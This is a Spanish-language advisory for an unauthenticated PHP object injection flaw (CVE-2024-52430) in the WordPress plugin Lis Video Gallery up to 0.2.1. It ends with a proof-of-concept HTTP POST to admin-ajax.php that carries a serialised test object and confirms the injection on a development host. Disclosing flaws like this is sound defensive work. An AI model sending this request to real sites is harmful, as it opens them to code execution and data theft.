
Lis Video Gallery <= 0.2.1 - Inyección de Objetos PHP No Autenticada
Lis Video Gallery <= 0.2.1 - Inyección de Objetos PHP no Autenticada
El plugin Lis Video Gallery para WordPress es vulnerable a la Inyección de Objetos PHP en versiones hasta la 0.2.1 inclusive, a través de la deserialización de entrada no confiable. Esto permite que atacantes no autenticados inyecten un objeto PHP. No se conoce una cadena POP presente en el software vulnerable. Si una cadena POP está presente mediante un plugin o tema adicional instalado en el sistema objetivo, podría permitir al atacante eliminar archivos arbitrarios, recuperar datos sensibles o ejecutar código.
CVE: CVE-2024-52430
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 9.8
Slugs: lis-video-gallery
POST /wp-admin/admin-ajax.php HTTP/2
Host: wp-dev.ddev.site
Content-Type: application/x-www-form-urlencoded
Content-Length: 79
action=loadmore&query=O%3a20%3a%22PHP_Object_Injection%22%3a0%3a%7b%7d&page=1
PHP object injection has occurred.